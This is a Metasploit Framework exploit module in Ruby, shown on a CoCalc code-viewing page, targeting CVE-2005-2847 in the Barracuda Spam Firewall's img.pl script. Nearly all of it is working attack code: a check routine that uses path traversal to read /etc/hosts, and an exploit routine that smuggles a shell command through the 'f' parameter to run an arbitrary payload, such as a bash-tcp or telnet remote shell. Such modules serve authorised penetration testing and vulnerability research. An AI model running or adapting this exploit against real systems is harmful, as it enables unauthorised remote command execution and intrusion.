CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/webapp/barracuda_img_exec.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Remote::HttpClient

11


12
  def initialize(info = {})

13
    super(update_info(info,

14
      'Name'           => 'Barracuda IMG.PL Remote Command Execution',

15
      'Description'    => %q{

16
          This module exploits an arbitrary command execution vulnerability in the

17
        Barracuda Spam Firewall appliance. Versions prior to 3.1.18 are vulnerable.

18
      },

19
      'Author'         => [ 'Nicolas Gregoire <ngregoire[at]exaprobe.com>', 'hdm' ],

20
      'License'        => MSF_LICENSE,

21
      'References'     =>

22
        [

23
          ['CVE', '2005-2847'],

24
          ['OSVDB', '19279'],

25
          ['BID', '14712'],

26
          ['URL', 'http://www.nessus.org/plugins/index.php?view=single&id=19556']

27
        ],

28
      'Privileged'     => false,

29
      'Payload'        =>

30
        {

31
          'DisableNops' => true,

32
          'Space'       => 4000,

33
          'Compat'      =>

34
            {

35
              'PayloadType' => 'cmd cmd_bash',

36
              'RequiredCmd' => 'generic perl ruby bash-tcp telnet',

37
            }

38
        },

39
      'Platform'       => 'unix',

40
      'Arch'           => ARCH_CMD,

41
      'Targets'        => [[ 'Automatic', { }]],

42
      'DisclosureDate' => '2005-09-01',

43
      'DefaultTarget' => 0))

44


45
    register_options(

46
      [

47
        OptString.new('URI', [true, "The full URI path to img.pl", "/cgi-bin/img.pl"]),

48
      ])

49
  end

50


51
  def check

52
    res = send_request_cgi({

53
      'uri'      => normalize_uri(datastore['URI']),

54
      'vars_get' =>

55
      {

56
        'f' => ("../" * 8) + "etc/hosts"

57
      }

58
    }, 25)

59


60
    if (res and res.body.match(/localhost/))

61
      return Exploit::CheckCode::Vulnerable

62
    end

63


64
    return Exploit::CheckCode::Safe

65
  end

66


67
  def exploit

68
    res = send_request_cgi({

69
      'uri'      => normalize_uri(datastore['URI']),

70
      'vars_get' =>

71
      {

72
        'f' => ("../" * 8) + %Q!bin/sh -c "echo 'YYY'; #{payload.encoded}; echo 'YYY'"|!

73
      }

74
    }, 25)

75


76
    if (res)

77
      print_status("The server returned: #{res.code} #{res.message}")

78
      print("")

79


80
      m = res.body.match(/YYY(.*)YYY/)

81


82
      if (m)

83
        print_status("Command output from the server:")

84
        print(m[1])

85
      else

86
        print_status("This server may not be vulnerable")

87
      end

88


89
    else

90
      print_status("No response from the server")

91
    end

92
  end

93
end

94


95